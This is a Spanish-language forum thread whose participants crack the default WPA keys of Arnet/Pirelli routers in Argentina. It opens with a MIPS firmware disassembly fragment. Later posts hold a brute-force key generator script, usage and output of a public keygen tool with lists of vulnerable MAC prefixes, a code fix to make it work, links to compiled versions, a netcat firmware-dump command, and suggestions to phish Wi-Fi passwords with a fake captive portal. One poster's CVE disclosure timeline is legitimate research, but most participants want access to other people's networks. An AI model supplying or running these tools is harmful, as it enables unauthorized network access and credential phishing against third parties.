la      $v0, createSSIDFromMAC
move    $t9, $v0
jalr    $t9 ; createSSIDFromMAC
nop
lw      $gp, 0xC8+var_B0($fp)
li      $v0, 0x20  # ' '
sw      $v0, 0xC8+var_90($fp)
li      $v0, 0xB
sw      $v0, 0xC8+var_90($fp)
addiu   $v0, $fp, 0xC8+var_90
la      $a0, key
move    $a1, $v0
lw      $a2, 0xC8+arg_0($fp)
la      $v0, 0xA0000
addiu   $a3, $v0, (a1236790 - 0xA0000)  # "1236790"
la      $v0, generateKey
move    $t9, $v0
jalr    $t9 ; generateKey
nop
lw      $gp, 0xC8+var_B0($fp)
la      $v0, 0xA0000
addiu   $a0, $v0, (aGeneratekey - 0xA0000)  # "generateKey"
la      $v0, puts
move    $t9, $v0
jalr    $t9 ; puts
nop
lw      $gp, 0xC8+var_B0($fp)
lw      $v0, 0xC8+var_90($fp)
la      $a0, passphrase
la      $a1, key
move    $a2, $v0
la      $v0, createWPAPassphraseFromKey
move    $t9, $v0
jalr    $t9 ; createWPAPassphraseFromKey
nop
lw      $gp, 0xC8+var_B0($fp)
la      $v0, 0xA0000
addiu   $v0, (aPassphraseSIdx - 0xA0000)  # "PassPhrase=%s ,idx=%d\n"
move    $a0, $v0
la      $a1, passphrase
lw      $a2, 0xC8+arg_0($fp)
la      $v0, printf
move    $t9, $v0
jalr    $t9 ; printf
nop
lw      $gp, 0xC8+var_B0($fp)
sw      $zero, 0xC8+var_98($fp)
b       loc_1E
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 04 de Agosto de 2014, 11:52:16 PM
hola que datos se te puede pasar para ayudar, che desics q se puede hackear esos routers?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 05 de Agosto de 2014, 01:03:31 PM
mac, wpa, serial number y una foto de la pegatina trasera donde van los datos no estaría mal tampoco.

Todo por privado.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 05 de Agosto de 2014, 09:22:04 PM
hola te puedo pasar un par de claves pero no tngo adceso a las fotos del router si te sirve
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 06 de Agosto de 2014, 03:08:08 AM
Mandarme lo que podais.  ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 09 de Agosto de 2014, 07:39:29 PM
Durante meses estuve juntando datos de los routers de Arnet.
Estas son todas las fotos de los routers adb broadband que pude conseguir.
Espero que te sean útiles 2kW79@32WEYS.

Saludos.

(http://www.subeimagenes.com/img/0184-1052237.jpg)

(http://www.subeimagenes.com/img/1453-1052183.jpg)

(http://www.subeimagenes.com/img/2337-1052186.jpg)

(http://www.subeimagenes.com/img/2529-1052190.jpg)

(http://www.subeimagenes.com/img/3435-1052194.jpg)

(http://www.subeimagenes.com/img/5189-1052198.jpg)

(http://www.subeimagenes.com/img/6325-1052201.jpg)

(http://www.subeimagenes.com/img/8217-1052202.jpg)

NOTA: Para colocar imágenes solamente pegar la Url en tamaño completo, automáticamente se achicara y trabajara con el visualizador. Ejemplo:

[img]http://www.subeimagenes.com/img/8217-1052202.jpg[/img]
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Agosto de 2014, 11:14:17 PM
Perfecto christian. Me valen para poder empezar a probar.

Gracias.

p.s.- Avisarme si alguein se anima al reversing
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 17 de Agosto de 2014, 12:40:44 AM
Qué laburo viejo!!!. Me voy a poner las pilas también para sacarle fotos a todos los ADB de Arnet que ne cruce, lo prometo. Espero que se pueda hacer algo... :(
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 19 de Agosto de 2014, 09:58:22 PM
 :) buenas a todos! he encontrado este post y he decidido aportar... estuve buscando y preguntando entre amigos y no he encontrado una relacion entre mac ssid y contraseña asi que no me ha quedado otra que fuerza bruta... al intentarlo con jhon the ripper o crunch me di cuenta que la generacion de keys no era apropiada y muy lenta... porque si inicia con el 1111111111a y tiene que llegar a la mitad lleva mucho tiempo asi que cree un script en python para hacer la generacion de keys mas aleatoria.... siguiendo algunos criterios en este post han puesto...

#!/usr/bin/env python

from sys import exit
from random import choice, randint


longitudl = 6
longitudn = 4
letrasmin = "abcdefghijklmnopqrstuvwxyz"
letrasmay = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
numeros = "0123456789"
longitud = longitudl + longitudn
valores1 = numeros + letrasmin
valores2 = numeros + letrasmay
valores3 = numeros + letrasmay + letrasmin

def mezclaCadena(cadena):
   nuevaCadena=""
   posicionesUtilizadas=[];
   while len(posicionesUtilizadas)<len(cadena):
       aleatorio=randint(0,len(cadena)-1)
       if not aleatorio in posicionesUtilizadas:
           posicionesUtilizadas.append(aleatorio)
           nuevaCadena+=cadena[aleatorio]
   return nuevaCadena

def generar2():
  c=0
  while (c < 1):
   part1 = ""
   part2 = ""
   part3 = ""
   p = ""
   part1 = p.join([choice(letrasmin) for i in range(longitudl)])
   p = ""
   part2 = p.join([choice(numeros) for i in range(longitudn)])
   p = ""
   part3 = mezclaCadena(part2+part1)
   print part3

def generar():
  c=0
  while (c < 1):
   p = ""
   p = p.join([choice(valores2) for i in range(longitud)])
   print p

def salir():
  exit()   

if __name__ == '__main__':
  generar2()
  salir()


Este codigo permite generar dos tipo de keys ya sea completamente aleatoria sin ninguna especificacion o siguiendo la regla de los 4 numeros y 6 letras...
hasta el momento he intentado haciendo 40millones de keys eso me lleva 10 horas! probe aleatorio completo con minusculas y numeros, con mayusculas y numeros, y ahora con el metodo de las 4-6... sigue siendo incierto saber si aparecera o no... ni si la key esta mas a lla de los 40milones o no! aca les dejo una captura de lo que estoy haciendo...
(http://www.***/i/140820025621903643.png)
Espero que les sirva...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Septiembre de 2014, 10:36:03 AM
¿Alguien con el router fisicamente?  Necesitaría saber si este fichero "/var/hwaddr"  contiene la misma BSSID que aparece en la pegatina


La manera mas sencilla es conectar via telnet y listar el fichero con cat
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 12:17:38 PM
Hola 2kW79@32WEYS!!  :) mira, estoy adentro del router ahora mismo! y como admin no veo ese archivo! como te has logueado? con que usuario y contraseña? estoy intentado ver los archivos cgi de la carpeta webs y aun nada! porque? porque mi teoria es que la generacion de claves esta dentro del mismo router asi que los cgi contendrian o el algoritmo o la pista de donde esta esos archivos...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 12:22:11 PM
perdon ya encontre el archivo que mencionaste y te cuento que si, la mac de br0 es la bssid del wifi  :) ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 11 de Septiembre de 2014, 03:05:11 PM
que onda con este hilo?? hay progreso o no hay progreso?? vienen complicaditas las wifi arnet parece jajaja.

saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 03:28:24 PM
You are not allowed to view links. Register or Login
Hola 2kW79@32WEYS!!  :) mira, estoy adentro del router ahora mismo! y como admin no veo ese archivo! como te has logueado? con que usuario y contraseña? estoy intentado ver los archivos cgi de la carpeta webs y aun nada! porque? porque mi teoria es que la generacion de claves esta dentro del mismo router asi que los cgi contendrian o el algoritmo o la pista de donde esta esos archivos...

Como os digo que yo no tengo acceso al router y no soy de Argentina, pero he mirado el firmware y tengo el algoritmo despellejado. Hay una semilla en formato bytearray de longitud 32, la mac esta invuelta tambien. Ahora queda confirmado que es la macwifi. En otro firmware de un router de otro pais encontre la semilla con el disasembler, pero con este router no la veo por ningun lado. Tiene que estar, tengo la memory address donde se localiza.

Voy algo mal de tiempo, vamos que lo hago por diversión. Asi que poco a poco, y primero lo que va primero :)

El algoritmo es sha256(semilla de 32 bytes+ ????+ macwifi 6 bytes)  y luego hay una conversion con este charset en la funcion bin2ascii
"0123456789abcdefghijklmnopqrstuvwxyz"

El algoritmo esta ahi, aun falta descifrar el argumento del medio, parece ser el serial. Pero he de jugar un poco y debuggear un rato y lleva tiempo. Al final saldrá!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 03:33:19 PM
Acabo de encontrar la semilla  secreta 8)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 04:07:30 PM
 :)  :) ???  ::)  :-*  :-*  :-* cuanteeeeeeeeeee
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 04:15:51 PM
hay cambios y parece diferente pero creo que se puede!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 11 de Septiembre de 2014, 04:18:12 PM
conta...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Septiembre de 2014, 04:20:52 PM
mira tus privados
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 11 de Septiembre de 2014, 05:24:46 PM
y viejo lograste encontrar algo?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 11 de Septiembre de 2014, 08:10:03 PM
You are not allowed to view links. Register or Login
mira tus privados

Matarias lo pongas en publico a ver si  con tu ayuda podemos aportar algo....
Soy novato igual pero me doy maña y me gustan los problemas.

Abrazo
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 12 de Septiembre de 2014, 06:44:11 AM
Aun investigando.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 14 de Septiembre de 2014, 01:19:21 PM
 ;D Wooow Grande GENIOS !!! Se acerca el final... :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 14 de Septiembre de 2014, 05:48:37 PM
 ;D hola gente... mi opinion es que el algoritmo esta dentro del router pero a saber... existen varios usuarios y el usuario admin no puede ser esos archivos, creo que el ausuario support si los podria ver pero no he econtrado la manera de acceder como tal... alguien sabe que pass puede ser?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 27 de Noviembre de 2014, 01:45:31 AM
hola encontre una alternativa es un programa llamado linset que lo trae el wifislax en su version 4.9 con este software se puede hacer una falsa red en donde el usuario tiene que poner su contraseña funciona yo lo probe,tngo un pedido quien tnga conocimiento en php ay que modificar la interfas que trae el software en donde ponen la contraseña es una pagina web habria que hacer parecida a la interfas que usa arnet para configurar sus modem, por ahi si alguin se anima a hacerlo
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 27 de Noviembre de 2014, 03:57:58 PM
You are not allowed to view links. Register or Login
hola encontre una alternativa es un programa llamado linset que lo trae el wifislax en su version 4.9 con este software se puede hacer una falsa red en donde el usuario tiene que poner su contraseña funciona yo lo probe,tngo un pedido quien tnga conocimiento en php ay que modificar la interfas que trae el software en donde ponen la contraseña es una pagina web habria que hacer parecida a la interfas que usa arnet para configurar sus modem, por ahi si alguin se anima a hacerlo

si yo tambien probe ese programa y funciona pocas veces... por un lado esta el cambio ese q hablas para hacerlo mas creible y por el otro lado no funciona al intentar cargar pag simples del tipo google, facebook, hotmail, gmail... (todas del tipo https)... todas paginas tipicas q la gente normalmente intenta entrar y en las cuales el programa no funciona (el portal cautivo no carga)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 28 de Noviembre de 2014, 01:14:28 AM
You are not allowed to view links. Register or Login
si yo tambien probe ese programa y funciona pocas veces... por un lado esta el cambio ese q hablas para hacerlo mas creible y por el otro lado no funciona al intentar cargar pag simples del tipo google, facebook, hotmail, gmail... (todas del tipo https)... todas paginas tipicas q la gente normalmente intenta entrar y en las cuales el programa no funciona (el portal cautivo no carga)
gracias por contestar, si la verdad que habria que probar hacer lo mas parecida a la paginas de arnet yo estube leyendo que se puede modificar el scrip del programa pero ni  idea como se hace por ahi que pueda hacer ese laburo sera bueno, yo que estube notando que la mayoria de la gente entra al face o a whatsapp si se modifica el portal cautivo podria se mas creible
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 06 de Diciembre de 2014, 02:31:41 AM
 8) Estoy en la tarea, les cuento... me baje un supuesto firmware del router, lo decompile en linux, me fui a la carpeta webs y alli analilze el codigo fuente del archivo wlsecurity.html y dentro de el hay este fragmento de codgio interensate
Citar<!-- hide
var syncNvram = '<%ejGetWl(wlSyncNvram)%>';
var ssidIdx = '<%ejGetWl(wlSsidIdx)%>';
var enblWireless = '<%ejGetWl(wlEnbl_wl0v0)%>';
var radiusServerIP = '<%ejGetWl(wlRadiusServerIP)%>';
var mode = '<%ejGetWl(wlAuthMode)%>';
var bit = '<%ejGetWl(wlKeyBit)%>';
var keyIdx = '<%ejGetWl(wlKeyIndex)%>';
var keys = new Array( "<%ejGetWl(wlKey1)%>", "<%ejGetWl(wlKey2)%>",
                      "<%ejGetWl(wlKey3)%>", "<%ejGetWl(wlKey4)%>" );
var wpaPskKey = '<%ejGetWl(wlWpaPsk)%>';
Buscando sobre que significaba <%ejGetWl( encontre que un codigo enbebido del mismisimo httpd entonces para corroborar esto use ida pro y desensamble el archivo httpd alli encontre el nombre de cada funcion que aparece en este html y en otros.. asi que es por alli donde empezar a buscar el algoritmo que genera las claves por defecto de los router o por lo menos esa es mi teoria... quien se quiera sumar me avisa que necesito ayuda  ;D
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 07 de Diciembre de 2014, 09:28:17 PM
@pantersxx3 Somos varios los que estamos analizando los algoritmos de estos routers  ;) desde mi parte estoy buscando por telnet dentro del busybox..
Respecto a lo que encontraste no es nada revelador, simplemente son unas declaraciones de variables que de todas maneras se agradece por compartir.
La clave es encontrar la función que transforma la Mac en una WPA.

PD:  Gente de Mexico descubrió dicha función en routers Huawei HG5XX
http://websec.ca/blog/view/mac2wepkey_huawei

Estoy seguro que para 2015 tendremos el algoritmo de Arnet en nuestras manos..

Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 08 de Diciembre de 2014, 08:22:59 AM
 ;) ya lo se estimado! solo lo puse como punto de partida! tambien estoy con el tema del telnet y el busybox... la onda es ver que mas podemos hacer en conjunto...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pantersxx3 en 09 de Diciembre de 2014, 04:30:58 PM
 8) sin querer segui el mismo camino que un compañero antes posteo... lo puso en assembler pero no me di cuenta... solo que el nose que mas estaba haciendo... pero esta dentro de una libreria privada.. me esta costando entender el assembler mips nomas
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 27 de Diciembre de 2014, 12:50:22 PM
Me llegó el modem nuevo de arnet, un ADB 2210, una mugre atomica que no me deja sincronizar 10 mb ni a palos.

(http://www.hapshack.com/images/EDJZQ.jpg)

Y me había prestado un conocido un hermoso Zyxel 660 que anda bastante mejor, incluso me sincroniza más alto.

(http://www.hapshack.com/images/6UqgC.jpg)

Descarga de ambas imagenes (http://ge.tt/316qyX72/v/0?c) (por si se cae el host)

Espero que a alguien le sea útil esa info.
Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 02 de Enero de 2015, 05:38:53 PM
Otro zyxel p660 que me prestaron hoy:

(http://www.hapshack.com/images/aMh1H.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 03 de Enero de 2015, 03:19:20 AM
Gran aporte @badder, por el momento no le encontré nada posible..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 05 de Enero de 2015, 07:33:19 PM
Acabo de liberar el algoritmo de Pirelli Arnet, espero que la compañia solucione los problemas causados.

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina
http://ednolo.alumnos.upv.es/?p=1883

Citar
*Timeline    :
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 06 de Enero de 2015, 10:57:18 AM
disculpa mi ignorancia,se puede hace un ejecutable del algoritmo?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 06 de Enero de 2015, 10:51:20 PM
You are not allowed to view links. Register or Login
disculpa mi ignorancia,se puede hace un ejecutable del algoritmo?

En un terminal:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ cd adbpirelli
$ python wifiarnet.py


Desde wifislax podes lanzarlo perfectamente, en windows creo que si tenes instalado python tendría que andar también.

Uso:

$ python wifiarnet.py -v
wifiarnet.py 1.0 [2014-09-11] ----> http://www.ednolo.alumnos.upv.es


$ python wifiarnet.py
usage: wifiarnet.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli
are likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable targets (essid Wifi-Arnet-XXXX)

required:
  -b [BSSID], --bssid [BSSID]
                    Target mac address

(+) Help: python wifiarnet.py -b 74:88:8B:AD:C0:DE


$ python wifiarnet.py -l
[+] Possible vulnerable targets so far:
     bssid: 00:08:27:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:13:C8:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:17:C2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:19:3E:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:1C:A2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:1D:8B:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:22:33:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 00:8C:54:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 30:39:F2:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 74:88:8B:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: 84:26:15:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: A4:52:6F:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: A4:5D:A1:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: D0:D4:12:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: D4:D1:84:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: DC:0B:1A:XX:XX:XX    essid: Wifi-Arnet-XXXX
     bssid: F0:84:2F:XX:XX:XX    essid: Wifi-Arnet-XXXX


$ python wifiarnet.py -b 74:88:8B:AD:C0:DE
[+] SSID    : Wifi-Arnet-XXXX
[+] MAC     : 74:88:8B:AD:C0:DE
[+] WPA key : hj0wl2c2r7


y ya hay aplicación para Android:



http://wpamagickey.blogspot.com.ar/
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 07 de Enero de 2015, 07:37:15 PM

gracias por la ayuda lo acabo de probar y lamentablemente la clave que me tiro es incorrecta le probe en un modem pirelli modelo pdg a4001n software pdg_tar_4.06L.02.2813  y la clave es P9VRfW3EYVYFh estuve mirando y estan viniendo con claves de 13 caracteres
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 07 de Enero de 2015, 11:36:36 PM
Fijaste que si pones -l te da las MAC Address compatibles, por ejemplo las que logro ver:

9C:D2:4B ZTE CORPORATION
08:7A:4C Huawei Technologies Co., Ltd
28:28:5D ZyXEL Communications Corporation
F0:84:2F ADB Broadband Italia
64:2D:AB -no se sabe-
A4:52:6F ADB Broadband Italia
FC:F5:28 ZyXEL Communications Corporation
4C:AC:25 -no se sabe-
B4:82:FE Askey Computer Corp

Las Compatibles:

00:08:27
00:13:C8
00:17:C2
00:19:3E
00:1C:A2
00:1D:8B
00:22:33
00:8C:54
30:39:F2
74:88:8B
84:26:15
A4:52:6F
A4:5D:A1
D0:D4:12
D4:D1:84
DC:0B:1A
F0:84:2F
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 08 de Enero de 2015, 01:29:31 AM
hola probe con un router que trae por la mac F0:84:2F aparece ultima en la lista esa lista y me dice que la contraseña es incorrecta  :( vos verificaste alguna? @D3M0N
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 08 de Enero de 2015, 10:42:17 PM
Lamentablemente las tengo bastante lejos las redes como para lograr una conexion, pero segun las imágenes que tenemos en el hilo pude verificar las siguientes MAC Address:

00:8C:54:XX:XX:XX
74:88:8B:XX:XX:XX
D4:D1:84:XX:XX:XX


En si la lista es a base del fabricante:

00-08-27
00-13-C8
00-17-C2
00-19-3E
00-1C-A2
00-1D-8B
00-22-33
00-8C-54
30-39-F2
74-88-8B
84-26-15
A4-52-6F
A4-5D-A1
D0-D4-12
D4-D1-84
DC-0B-1A
F0-84-2F


Puedes verla en: http://www.mac-address.info/ADB%20Broadband%20Italia
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 09 de Enero de 2015, 04:35:23 PM
You are not allowed to view links. Register or Login
hola probe con un router que trae por la mac F0:84:2F aparece ultima en la lista esa lista y me dice que la contraseña es incorrecta  :( vos verificaste alguna? @D3M0N

¡Hola, amigos! Si la clave que les da es incorrecta prueben a editar esta parte del código:

mac = bytearray.fromhex('%012x' %(int(mac_str,16) +1))

Y déjenla así:

mac = bytearray.fromhex('%012x' %(int(mac_str,16)))

Lo comprobé con dos router y funciona perfecto...
Pruebenlo, obviamente si la MAC es compatible.
Hice correr el script en Windows instalando Python, aunque fue un poquito más complejo que solo instalarlo. Corranlo desde Wifislax, anda genial y no tienen que instalar nada.

Saludos y espero les sirva!! :D

Si no saben como editarlo o no se dan cuenta, acá lo tienen ya editado:
https://mega.co.nz/#!xBIQBCoL!7Q73F3qrqBD3qrs3cXNiZpt74CfjHhtg4AZchWGNmuE
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Enero de 2015, 05:25:09 AM
@Nicash: Perfecto! a probar se ha dicho! igual modifique el Script para que de los dos posibles keys directamente:

(http://i.minus.com/iAmxEhRQT2CaI.png)

Script: http://arg-wireless.com.ar/Arnet-Archivos/arnetwpa.py (http://arg-wireless.com.ar/Arnet-Archivos/arnetwpa.py)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Enero de 2015, 10:20:42 AM
¿Solo pasa con esa MAC? Yo probe la lista de la pagina 8 y funcionaba en todos los casos.
Porfavor mandarme un mail con los detalles y cuando pueda lo modificare y asi estara actualizado
en Wifislax tambien. Si quereis commitear un pull-request y mirare el codigo.

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 10 de Enero de 2015, 01:21:59 PM
You are not allowed to view links. Register or Login
¿Solo pasa con esa MAC? Yo probe la lista de la pagina 8 y funcionaba en todos los casos.
Porfavor mandarme un mail con los detalles y cuando pueda lo modificare y asi estara actualizado
en Wifislax tambien. Si quereis commitear un pull-request y mirare el codigo.

Saludos

Para mi el problema está en que las etiquetas no muestran la MAC real del router. Por lo que si usamos un scanner de redes y usamos esa MAC con el script original no nos va a funcionar, porque la MAC real es +1 de lo que figura en la etiqueta.
El algoritmo calcula correctamente el password para la MAC de la etiqueta, pero si no tenemos acceso físico al router tendremos que modificarle esa linea de código que dije para obtener el password.

Aquí dejo de ejemplo el router al que tengo acceso físico:

(http://i.minus.com/igCwby9obsjus.jpg)

(http://i.minus.com/i5zaUni0eEgrY.jpg)

¡Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 10 de Enero de 2015, 01:35:25 PM
@2kW79@32WEYS,@Nicash,@D3M0N  son unos grosos funciona probe con una y funka de maravilla, una consulta me tope con un modem de arnet estos dias de la marca zyxel modelo p-600hnu tlv2 lo raro es que trae una clave predeterminada de 13 caracteres alfanumericos mayusculas y minusculas un ejemplo de estea es: P9VRfW3EYVYFh se podria usar este algoritmo para que tratar de desencriptar estas claves?


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Enero de 2015, 02:33:45 PM
@ matt_1210: Me puedes pasar o un firmware de ese Zyxel o un router fisico?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Enero de 2015, 04:24:08 PM
Compilado para windows: http://www.arg-wireless.com.ar/Arnet-Archivos/arnet-wpa-exe.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/arnet-wpa-exe.rar)

uso:

arnetwpa.exe -b MAC

desde una consola.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 10 de Enero de 2015, 04:28:28 PM
D3m0n hay una nueva version en el repositorio. Podiais probar esa?
Si haces un binario con py2exe estaria genial. Gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 10 de Enero de 2015, 06:46:30 PM
@2kW79@32WEYS: che no tengo ni  idea como te puedo pasar el firmware,alguien que me pueda guiar
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Enero de 2015, 09:53:56 PM
@2kW79@32WEYS: v1.1 http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.1.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.1.rar)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2015, 06:07:21 PM
@matt_1210: me pregunte lo mismo y encontré un programa que se llama: teleport pro (http://files.tenmax.com/Teleport_Pro_Installer.exe) que lo que hace es extraer toda la interfaz web del router.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 11 de Enero de 2015, 07:49:28 PM
You are not allowed to view links. Register or Login
@matt_1210: me pregunte lo mismo y encontré un programa que se llama: teleport pro (http://files.tenmax.com/Teleport_Pro_Installer.exe) que lo que hace es extraer toda la interfaz web del router.

gracias viejo voy a ver si puedo extraer algo de info
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 11 de Enero de 2015, 07:51:07 PM
Una forma es mirar si existe netcat, sino crosscompilarlo para MIPS o buscar uno compilado.

Desde el router : cat /dev/mtdblock[0-5]  | nc -l -p 6666
Desde un PC:     nc IProuter 6666 > firmware.bin


Otra seria mirar si teneis SSH y usar SCP. Hay muchas maneras, dependiendo del privilegio que tengas. Sino desoldando memoria y leyendola.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2015, 07:55:46 PM
Recién me apareció una de las redes que tengo de un Zte que saque gracias a que tenia WPS activo,

Archivos WebServer:
Config. Basico Arnet: http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-basica-arnet.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-basica-arnet.rar)
Config. Avanzado Zte: http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-avanzada.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/webserver-zte-config-avanzada.rar)

Más info: http://arg-wireless.com.ar/index.php?topic=1006.msg5876#msg5876 (http://arg-wireless.com.ar/index.php?topic=1006.msg5876#msg5876)

Ahora veo de sacar el firmware, eso se haría desde un terminal o cmd?

@2kW79@32WEYS: tiene Telnet, no tiene SSH y tampoco se puede activar.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2015, 08:26:02 PM
ESSID: WiFi-Arnet-??XX (?? = Minusculas - XX = Mayusculas)
BSSID: B4:B3:62
Marca: ZTE Corporations
Software Versión: ZTE ZXHN H108N V3.0.00_TAT26
Hardware Versión: 96328avng
Boot Loader Version: 1.0.37-106.24
Serial Number: b4b3626d877b

Info: http://arg-wireless.com.ar/index.php?topic=1006.msg6013#msg6013 (http://arg-wireless.com.ar/index.php?topic=1006.msg6013#msg6013)

Firmware: http://www.arg-wireless.com.ar/Arnet-Archivos/H108N_V3.0.00_TAT26.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/H108N_V3.0.00_TAT26.rar)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 11 de Enero de 2015, 08:48:59 PM
Muy guenas a todos !!

Mas firmwares y mas datos buenos sobre ADB Pirelli. Please.

WPAmagicket.blogspot.com

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 12 de Enero de 2015, 12:23:26 AM
@buckynet: sin APK no hay paraíso..  :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 12 de Enero de 2015, 02:24:57 AM
felicitaciones son unos grosos las de arnet q parecian infranqueables le dieron su merecido!! lastima q solo salen las de los comtrend y solo unos modelos ahora hay q ir a por mas jejeje y si ya sacan el algoritmo de las de fibertel les hacemos un monumento jaja saludos
